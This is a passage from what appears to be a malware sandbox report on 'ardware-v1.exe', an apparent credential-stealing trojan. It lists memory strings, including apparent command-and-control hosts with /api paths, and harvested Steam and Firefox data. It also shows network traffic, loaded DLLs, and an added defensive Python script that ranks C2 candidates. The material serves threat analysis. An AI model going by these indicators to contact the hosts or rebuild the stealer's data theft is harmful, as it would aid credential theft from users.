00000000.00000003.3199544092.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3221154051.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3153106623.000000000358F000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3119118468.0000000003596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api00
Source: ardware-v1.exe, 00000000.00000002.3221085949.0000000003500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiERPR
Source: ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apim
Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apis7
Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/e
Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/op
Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pis$
Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/te
Source: ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/uo
Source: ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/xt
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: ardware-v1.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sordid-snaked.cyou/api
Source: ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sordid-snaked.cyou/s
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wrathful-jammy.cyou/
Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wrathful-jammy.cyou/DI;
Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ardware-v1.exe | String found in binary or memory: https://www.ssl.com/repository0
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
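The URL rows above mix three different things: the sample's own command-and-control strings (lev-tolstoi.com, sordid-snaked.cyou, wrathful-jammy.cyou, all hit with an /api path), URLs the stealer scraped out of browser and Steam data on the analysis machine (the steampowered.com, mozilla.org and recaptcha rows), and certificate-policy URLs that are simply part of the signed file (sectigo.com, ssl.com, found with no .sdmp dump attached). The junk after some paths (/apiERPR, /apis7, /pis$) is the string scanner running past the end of the URL into adjacent bytes, so group by host rather than by full URL. The script below is an added example, not part of the report or of the sample: it parses the rows in their raw extracted form, counts the distinct memory dumps that reference each host, and demotes hosts that only ever occur in dumps that also hold allowlisted browser data. The allowlist and the verdict labels are assumptions; the sample rows are copied from the report.

```python
"""Triage the 'String found in binary or memory' rows of a Joe Sandbox report.

Added example; not part of the report or of the sample.  Groups URL hits by
host, counts the distinct memory dumps (.sdmp) each host occurs in, and demotes
hosts that only ever appear in dumps that also hold allowlisted browser/Steam
strings, so that C2 candidates separate from scraped browser data.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Accepts the raw extracted form ("...sdmpString found...") and a form with a
# " | " separator between the source cell and the finding cell.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)")
# One dump id: eight dot-separated hex fields followed by ".sdmp".
DUMP_RE = re.compile(r"(?:[0-9A-Fa-f]+\.){8}sdmp")

# Assumption: hosts that only mean "scraped browser/Steam/certificate data"
# for this sample; tune per case.
BENIGN_SUFFIXES = (
    "steampowered.com", "steamcommunity.com", "steam.tv", "akamaized.net",
    "mozilla.org", "google.com", "gstatic.com", "gstatic.cn", "youtube.com",
    "ytimg.com", "recaptcha.net", "vimeo.com", "medal.tv", "sketchfab.com",
    "valvesoftware.com", "amazon.com", "bestbuy.com", "ecosia.org",
    "sectigo.com", "ssl.com",
)

def is_benign(host):
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)

def parse(lines):
    """Yield (host, path, dump_ids) for every row that parses."""
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("url"))
        if url.hostname:
            yield url.hostname, url.path, frozenset(DUMP_RE.findall(m.group("src")))

def triage(lines):
    """Return {host: {"dumps": n, "paths": [...], "verdict": str}}."""
    dumps_of, paths_of = defaultdict(set), defaultdict(set)
    for host, path, dumps in parse(lines):
        dumps_of[host] |= dumps
        paths_of[host].add(path)
    # Dumps that contain at least one allowlisted host are "browser data" dumps.
    benign_dumps = set().union(*(dumps_of[h] for h in dumps_of if is_benign(h)))
    result = {}
    for host in dumps_of:
        if is_benign(host):
            verdict = "allowlisted"
        elif not dumps_of[host]:
            verdict = "static only (file body, e.g. certificate string)"
        elif dumps_of[host] <= benign_dumps:
            verdict = "co-located with browser data"
        else:
            verdict = "candidate C2"
        result[host] = {"dumps": len(dumps_of[host]),
                        "paths": sorted(paths_of[host]), "verdict": verdict}
    return result

def candidates(lines):
    """C2 candidates, most-referenced first (ties broken by host name)."""
    r = triage(lines)
    return sorted((h for h in r if r[h]["verdict"] == "candidate C2"),
                  key=lambda h: (-r[h]["dumps"], h))

# Constructed input: rows copied verbatim from the report in raw extracted form.
SAMPLE_LINES = [
    "Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/S$_",
    "Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api00",
    "Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis7",
    "Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/",
    "Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn",
    "Source: ardware-v1.exeString found in binary or memory: https://sectigo.com/CPS0",
    "Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api",
    "Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/",
    "Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig",
]

if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE_LINES).items(), key=lambda kv: kv[1]["verdict"]):
        print(f"{info['verdict']:<45} {host:<24} dumps={info['dumps']} paths={info['paths']}")
```

On the rows above this yields lev-tolstoi.com, sordid-snaked.cyou and wrathful-jammy.cyou as candidates and pushes lv.queniujq.cn down because its only dump is the same one that holds the Steam strings. The allowlist only hides hosts you already know to be harmless; a C2 parked on a CDN or an allowlisted second-level domain would slip through, so treat the ranking as a starting point and confirm against the network section of the report.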
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown | Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown | Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown | HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49858 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49869 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49892 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49899 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49932 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: C:\Users\user\Desktop\ardware-v1.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B0082B (listed 9 times in the report)
Source: ardware-v1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal96.troj.spyw.evad.winEXE@1/0@13/4
Source: ardware-v1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ardware-v1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ardware-v1.exe, 00000000.00000003.3029106103.0000000003512000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028963391.000000000352E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ardware-v1.exe | Virustotal: Detection: 15%
Source: ardware-v1.exe | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\ardware-v1.exe | File read: C:\Users\user\Desktop\ardware-v1.exe
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ondemandconnroutehelper.dll (4 consecutive loads)
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ardware-v1.exe | Section loaded: ondemandconnroutehelper.dll (6 consecutive loads)
Source: ardware-v1.exe | Static PE information: certificate valid
Source: ardware-v1.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ardware-v1.exe | Static file information: File size 3487960 > 1048576
Source: ardware-v1.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x312800
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ardware-v1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ardware-v1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb | source: ardware-v1.exe
